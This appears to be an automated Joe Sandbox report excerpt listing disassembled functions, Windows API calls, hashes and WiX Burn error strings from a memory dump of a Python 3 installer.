                                                                                                                                  • Opcode ID: 8b5e4a85060ea3021f4dc34d5e59d703e44691fdf646a4706719170f9696c496
                                                                                                                                  • Instruction ID: 84e58e530378c3a55a2886c6c09bbd26d2ba86b583194bdd1d9ab6e755b6b8fc
                                                                                                                                  • Opcode Fuzzy Hash: 8b5e4a85060ea3021f4dc34d5e59d703e44691fdf646a4706719170f9696c496
                                                                                                                                  • Instruction Fuzzy Hash: 95F0A737A41335A7D621AA966C0AF4BBF84EF00F71F024037FD08AA291D618DC1086DC
                                                                                                                                  APIs
                                                                                                                                  • PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 0049EBD3
                                                                                                                                  • GetLastError.KERNEL32 ref: 0049EBDD
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\engineforapplication.cpp, xrefs: 0049EC01
                                                                                                                                  • Failed to post detect message., xrefs: 0049EC0B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                  • String ID: Failed to post detect message.$c:\agent\_work\138\s\src\burn\engine\engineforapplication.cpp
                                                                                                                                  • API String ID: 2609174426-1752364159
                                                                                                                                  • Opcode ID: ad23297b588758b70c83f3f9cb09d45ce8667e44feb1e6adb20f0ebf9c438a82
                                                                                                                                  • Instruction ID: 25c3f6acfeddc4beb3c624280988fab4d26e00b20c9106df69a4c0724addf2ad
                                                                                                                                  • Opcode Fuzzy Hash: ad23297b588758b70c83f3f9cb09d45ce8667e44feb1e6adb20f0ebf9c438a82
                                                                                                                                  • Instruction Fuzzy Hash: D2F0A733641330A79620BA9B5C0AF47BF94EF00B61F114037FD49AA291D619DC1082DD
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\dlutil.cpp, xrefs: 004C643B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\dlutil.cpp
                                                                                                                                  • API String ID: 1659193697-3549464317
                                                                                                                                  • Opcode ID: f28c26c4cc6f044e9b6f456da7c27b086dd5f6adf9306ce421ccd8332d6b3d25
                                                                                                                                  • Instruction ID: 1f604942b334c7304cbeb233559b79d90449d649929ecf8a114b9eed52a0652b
                                                                                                                                  • Opcode Fuzzy Hash: f28c26c4cc6f044e9b6f456da7c27b086dd5f6adf9306ce421ccd8332d6b3d25
                                                                                                                                  • Instruction Fuzzy Hash: 1B51867A900265ABDF519FE58C84EAF7BB9EF48710B16802EED00A7210D774DD019B98
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,004C63D8,00000000,00000000,00000001), ref: 004C64EC
                                                                                                                                  • GetLastError.KERNEL32(?,?,004C63D8,00000000,00000000,00000001), ref: 004C653B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: $sN$c:\agent\_work\138\s\src\libs\dutil\dlutil.cpp
                                                                                                                                  • API String ID: 1452528299-841278959
                                                                                                                                  • Opcode ID: 4886c54adaaa028d5c77e63f5631f3af45ff4b66172e692dc5cdfa606cf02c96
                                                                                                                                  • Instruction ID: 7ae9ecdd95c006eff09b3795feb40362d8513c985e479925543ea6031a65d222
                                                                                                                                  • Opcode Fuzzy Hash: 4886c54adaaa028d5c77e63f5631f3af45ff4b66172e692dc5cdfa606cf02c96
                                                                                                                                  • Instruction Fuzzy Hash: C931C87A900226F79B619E959C44F5F76A8AF00765B23812FFD11A7350D738CD0097EC
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004C36D7
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004C36E3
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004C3757
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C3762
                                                                                                                                    • Part of subcall function 004C390F: SysAllocString.OLEAUT32(?), ref: 004C3924
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocVariant$ClearFreeInit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 347726874-0
                                                                                                                                  • Opcode ID: 2c32546db08aeb4b00b95b358c2c0c0dd6c64136bcbf830b0b91e7985813dfc7
                                                                                                                                  • Instruction ID: e5f1b2a8e78252fe73fcbe9dfd579b82d73fe5d7d1198297bca2c0c9d02e55e7
                                                                                                                                  • Opcode Fuzzy Hash: 2c32546db08aeb4b00b95b358c2c0c0dd6c64136bcbf830b0b91e7985813dfc7
                                                                                                                                  • Instruction Fuzzy Hash: CD213DB9901259EBCB54DFA4C848FAFBBB8EF45716F10816DE90197220D734EE05CB94
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,004B13F9,00000000,80004004,00000100,?,004B1731,00000000,80004004,00000000,00000000), ref: 004B5B92
                                                                                                                                  • _free.LIBCMT ref: 004B5BEF
                                                                                                                                  • _free.LIBCMT ref: 004B5C25
                                                                                                                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,004B1731,00000000,80004004,00000000,00000000), ref: 004B5C30
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: d7782a7607fdb587e9e498d438b5d59d93fc528fe206c5dfe354fc18b0e78b87
                                                                                                                                  • Instruction ID: cf9b8c6bfa720ee075efa449562bb4635c752749f98d1738063d8815913e79a9
                                                                                                                                  • Opcode Fuzzy Hash: d7782a7607fdb587e9e498d438b5d59d93fc528fe206c5dfe354fc18b0e78b87
                                                                                                                                  • Instruction Fuzzy Hash: 18113D316086857ACA10377B5CC1FAB751AD7C1378B240A3BF620966E3EE6C9D01417C
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,00000100,00000000,004B3B0A,00483D1D,80004005,00000000,?,c:\agent\_work\138\s\src\burn\engine\cabextract.cpp,000001C7), ref: 004B5CE9
                                                                                                                                  • _free.LIBCMT ref: 004B5D46
                                                                                                                                  • _free.LIBCMT ref: 004B5D7C
                                                                                                                                  • SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 004B5D87
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: 4dfb3b4e42e4d1bb9f9e193040f013f51c46e29e2d347242ca650bf7314537e2
                                                                                                                                  • Instruction ID: e168d106cf887b1fee51eac83652a028523e4f41d91d60e5b818701fe236c839
                                                                                                                                  • Opcode Fuzzy Hash: 4dfb3b4e42e4d1bb9f9e193040f013f51c46e29e2d347242ca650bf7314537e2
                                                                                                                                  • Instruction Fuzzy Hash: 591129316049457AD620377B5CC9FAB721DDBC1378B24473BF1249A6E2EE2C8D01817C
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 004874F1
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 00487558
                                                                                                                                  Strings
                                                                                                                                  • Failed to get value as numeric for variable: %ls, xrefs: 00487547
                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0048752B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                  • API String ID: 3168844106-4270472870
                                                                                                                                  • Opcode ID: e655bd98f1fb116f04d4c6c9d0dffff8a115c01e2e1ec06a9fafaf5608fb5b2b
                                                                                                                                  • Instruction ID: fc63b94931958f45a2b6d011728eb84ba5ec4fbaa1f79e01f1a6c02822e62183
                                                                                                                                  • Opcode Fuzzy Hash: e655bd98f1fb116f04d4c6c9d0dffff8a115c01e2e1ec06a9fafaf5608fb5b2b
                                                                                                                                  • Instruction Fuzzy Hash: E7015E76944528FBCF12AB54CC15F9E7A69AF10365F204426FD04A6660C23ADE109BD8
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00487660
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 004876C7
                                                                                                                                  Strings
                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0048769A
                                                                                                                                  • Failed to get value as version for variable: %ls, xrefs: 004876B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                  • API String ID: 3168844106-1851729331
                                                                                                                                  • Opcode ID: 20682e2785ef5ff6f9985addf7df6f2357d4e4c96ccfd9c82e9bfad74d0f134d
                                                                                                                                  • Instruction ID: f55ab1b598e7861a7c650780569943279b1762debadee7a6eb579c4fdd0e3073
                                                                                                                                  • Opcode Fuzzy Hash: 20682e2785ef5ff6f9985addf7df6f2357d4e4c96ccfd9c82e9bfad74d0f134d
                                                                                                                                  • Instruction Fuzzy Hash: 5C015E36944528BBCF12AB48CC15F9E7F64AF20368F254466FD08B6260D23EDA119BDD
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00497027,000000B8,00000000,?,00000000,75A4B390), ref: 0048D561
                                                                                                                                  • LeaveCriticalSection.KERNEL32(000000D0,?,00497027,000000B8,00000000,?,00000000,75A4B390), ref: 0048D584
                                                                                                                                  Strings
                                                                                                                                  • Engine active cannot be changed because it was already in that state., xrefs: 0048D5A7
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\userexperience.cpp, xrefs: 0048D59D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: Engine active cannot be changed because it was already in that state.$c:\agent\_work\138\s\src\burn\engine\userexperience.cpp
                                                                                                                                  • API String ID: 3168844106-656309086
                                                                                                                                  • Opcode ID: f69a5280d605b33f731b060c9d8c09869504db3ad658533527307a1ca6381587
                                                                                                                                  • Instruction ID: 847f109b5ee0b235e982f39c0ad51c447a7aa492af23d89ad695becda6470204
                                                                                                                                  • Opcode Fuzzy Hash: f69a5280d605b33f731b060c9d8c09869504db3ad658533527307a1ca6381587
                                                                                                                                  • Instruction Fuzzy Hash: 21F0F432300300AF8711AEAA9C85E8B73ECFF98319700083FF905C7280EA75E80583A8
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,0048994D,00000000,?,00000000,00000000,00000000,?,0048978E,00000000,?,00000000,00000000), ref: 004875F1
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,0048994D,00000000,?,00000000,00000000,00000000,?,0048978E,00000000,?,00000000), ref: 00487647
                                                                                                                                  Strings
                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 00487617
                                                                                                                                  • Failed to copy value of variable: %ls, xrefs: 00487636
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                                                                                                  • API String ID: 3168844106-2936390398
                                                                                                                                  • Opcode ID: 8102b9fc155a093b7a6d012ae62a2dc72f4b48664f97c9809aa770b2f7fdf7d2
                                                                                                                                  • Instruction ID: 3c3c5324dbbbf3d2a545292435f7635b618ca6cd2ed1a07debdb1510e586db40
                                                                                                                                  • Opcode Fuzzy Hash: 8102b9fc155a093b7a6d012ae62a2dc72f4b48664f97c9809aa770b2f7fdf7d2
                                                                                                                                  • Instruction Fuzzy Hash: FDF08136944528BBCF126F54CC1AE9E7F69EF10365F104416FC04B6260D73ADA1197D8
                                                                                                                                  APIs
                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,004BD875,00000000,00000001,00000000,00000000,?,004BCA79,00000000,I\K,00000000), ref: 004BEC9D
                                                                                                                                  • GetLastError.KERNEL32(?,004BD875,00000000,00000001,00000000,00000000,?,004BCA79,00000000,I\K,00000000,00000000,00000000,?,004BCFCD,00000000), ref: 004BECA9
                                                                                                                                    • Part of subcall function 004BEC6F: CloseHandle.KERNEL32(FFFFFFFE,004BECB9,?,004BD875,00000000,00000001,00000000,00000000,?,004BCA79,00000000,I\K,00000000,00000000,00000000), ref: 004BEC7F
                                                                                                                                  • ___initconout.LIBCMT ref: 004BECB9
                                                                                                                                    • Part of subcall function 004BEC31: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004BEC60,004BD862,00000000,?,004BCA79,00000000,I\K,00000000,00000000), ref: 004BEC44
                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,004BD875,00000000,00000001,00000000,00000000,?,004BCA79,00000000,I\K,00000000,00000000), ref: 004BECCE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                  • Opcode ID: efc0f98dc1cf59f5bfde0dd10f6405363cf9ca6027eeb58e401446328e87dfb8
                                                                                                                                  • Instruction ID: 2846479fd41de9cd21f6ea9dfb1cf57b2b709e6478f374e15cb370527c4dbb30
                                                                                                                                  • Opcode Fuzzy Hash: efc0f98dc1cf59f5bfde0dd10f6405363cf9ca6027eeb58e401446328e87dfb8
                                                                                                                                  • Instruction Fuzzy Hash: CBF0FE36400159BBCF622F92DC099CA3F65FF44365F018021FD1895220C732C820EBD8
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 004B4BF9
                                                                                                                                    • Part of subcall function 004B604F: HeapFree.KERNEL32(00000000,00000000,?,004B89CC,?,00000000,?,00000000,?,004B89F3,?,00000007,?,?,004B8E6D,?), ref: 004B6065
                                                                                                                                    • Part of subcall function 004B604F: GetLastError.KERNEL32(?,?,004B89CC,?,00000000,?,00000000,?,004B89F3,?,00000007,?,?,004B8E6D,?,?), ref: 004B6077
                                                                                                                                  • _free.LIBCMT ref: 004B4C0C
                                                                                                                                  • _free.LIBCMT ref: 004B4C1D
                                                                                                                                  • _free.LIBCMT ref: 004B4C2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: d09c4e965c27bd5023ae2e68af07e391698ef9e58330c0240bddda6f42d782ad
                                                                                                                                  • Instruction ID: 1410f0b64fc47ebd76956ddbdc146be43d2271e875691043bc630022086f3ebc
                                                                                                                                  • Opcode Fuzzy Hash: d09c4e965c27bd5023ae2e68af07e391698ef9e58330c0240bddda6f42d782ad
                                                                                                                                  • Instruction Fuzzy Hash: B4E04F70C001A09AC632BF9EBCE14953A35B784B4831202AAFC180E273C73D05139AEE
                                                                                                                                  APIs
                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,004BE09F), ref: 004BE74C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DecodePointer
                                                                                                                                  • String ID: HJ$_N
                                                                                                                                  • API String ID: 3527080286-3923374106
                                                                                                                                  • Opcode ID: 1a58dd6d80b6a47df47ff141112ba1ddca653b125dfd63f37096c47c529610f7
                                                                                                                                  • Instruction ID: ae72c4adf6c43b5623d4eb771777bd0bd252d57907f8a0c6cfa345f48242f289
                                                                                                                                  • Opcode Fuzzy Hash: 1a58dd6d80b6a47df47ff141112ba1ddca653b125dfd63f37096c47c529610f7
                                                                                                                                  • Instruction Fuzzy Hash: D8517D7490090ACBDF14AF6AE84C5EEBF74FB84305F154057E481AB264CB7C8926CB6D
                                                                                                                                  APIs
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004C12A5
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\regutil.cpp, xrefs: 004C1292
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\regutil.cpp
                                                                                                                                  • API String ID: 3535843008-3069916640
                                                                                                                                  • Opcode ID: a1f2168b0b04b408e7d3fd022e4a3db9461f5911b76d6474f980de4e3483c463
                                                                                                                                  • Instruction ID: a8502265c7c47400b03adfe38137a736d71acbeb2c1e776e0f22c136241beed9
                                                                                                                                  • Opcode Fuzzy Hash: a1f2168b0b04b408e7d3fd022e4a3db9461f5911b76d6474f980de4e3483c463
                                                                                                                                  • Instruction Fuzzy Hash: AD41C83ED00125ABDFA18A94CC04FBE76A1AB46760F1581AFE905FA272D73C8D1197CC
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C1436: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,004EBB7C,00000000,?,004C5BF9,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 004C144A
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,?,00000000,00000101), ref: 004C4D38
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen
                                                                                                                                  • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                  • API String ID: 47109696-3023217399
                                                                                                                                  • Opcode ID: 06c5f29603a458834fb53abbc30625963c20970c1b24ae7464a2df91d77ca6b9
                                                                                                                                  • Instruction ID: 649414f1b6a3e397e2ccb00a3b0977e4f9d043c9087fd5326d55d83033dbbbdc
                                                                                                                                  • Opcode Fuzzy Hash: 06c5f29603a458834fb53abbc30625963c20970c1b24ae7464a2df91d77ca6b9
